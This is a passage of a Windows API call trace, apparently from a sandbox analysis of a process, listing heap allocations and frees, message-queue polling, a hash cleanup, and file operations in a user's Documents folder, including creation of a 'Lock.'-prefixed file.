Size=0x8) returned 0x34a2130 [0266.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2120 [0266.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20d0 [0266.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0266.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20c0 [0266.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0266.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0266.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2070 [0266.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0266.739] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.739] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2130 [0266.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0266.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0266.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2120 [0266.740] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0266.740] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.740] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0266.740] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0266.740] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0266.740] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0266.740] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0266.740] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0266.740] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.741] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0266.741] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.741] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0266.741] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0266.741] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0266.741] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0266.741] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0266.741] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0266.741] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0266.741] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0266.742] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0266.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0266.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0266.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0266.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0266.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0266.742] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0266.742] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0266.742] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0266.743] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0266.743] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0266.743] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0266.743] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0266.743] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0266.743] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0266.743] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0266.743] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0266.743] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0266.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0266.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0266.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0266.744] CryptDestroyHash (hHash=0xaa5860) returned 1 [0266.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0266.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0266.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0266.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0266.744] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0266.745] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0266.745] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0266.745] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0266.745] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0266.745] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0266.745] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0266.745] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0266.745] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0266.745] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0266.746] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0266.746] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0266.746] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0266.746] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0266.746] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0266.746] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0266.746] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0266.746] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0266.747] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents/Zq0bBrnPbhA3GBBLi8" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\zq0bbrnpbha3gbbli8"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0266.747] GetLastError () returned 0x5 [0266.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0266.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0266.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x3551008 | out: hHeap=0x25c0000) returned 1 [0266.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0266.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0266.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0266.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0266.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0266.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0266.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0266.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0266.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0266.748] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0266.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0266.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0266.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0266.749] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0266.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0266.749] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0266.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0266.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0266.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0266.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0266.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0266.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0266.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0266.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0266.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0266.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0266.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0266.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0266.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0266.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0266.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0266.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0266.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0266.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0266.751] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0266.751] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xb0) returned 0x249c7b0 [0266.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0266.751] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents/" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents")) returned 0x11 [0266.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0266.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0266.751] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0266.751] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10000) returned 0x3551008 [0266.752] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0266.752] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0266.752] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents/Lock.Zq0bBrnPbhA3GBBLi8" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lock.zq0bbrnpbha3gbbli8"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0266.753] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0266.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0266.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0266.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0266.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0266.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0266.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0266.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0266.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0266.754] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0266.754] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0266.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0266.754] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0266.754] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0266.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0266.755] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0266.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0266.755] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0266.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0266.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0266.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0266.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0266.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0266.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0266.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0266.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0266.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0266.756] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0266.756] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0266.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0266.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0266.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0266.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0266.756] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0266.756] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0266.756] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0266.756] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0266.756] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0266.756] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0266.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0266.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0266.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0266.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0266.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0266.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0266.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0266.757] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0266.758] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0266.758] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0266.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0266.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0266.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0266.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0266.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0266.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0266.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0266.758] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0266.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0266.758] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0266.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0266.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0266.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0266.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0266.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0266.759] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0266.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1828 [0266.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0266.759] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0266.759] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0266.759] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0266.759] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0266.760] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0266.760] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0266.760] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0266.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0266.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0266.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0266.760] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0266.760] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0266.760] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0266.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0266.760] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0266.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0266.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0266.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0266.761] CharUpperBuffW (in: lpsz="A6000504F44", cchLength=0xb | out: lpsz="A6000504F44") returned 0xb [0266.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0266.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0266.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0266.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2058 [0266.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0266.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0266.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0266.761] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0266.762] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0266.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1828 [0266.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0266.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0266.762] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0266.762] RtlAllocateHeap 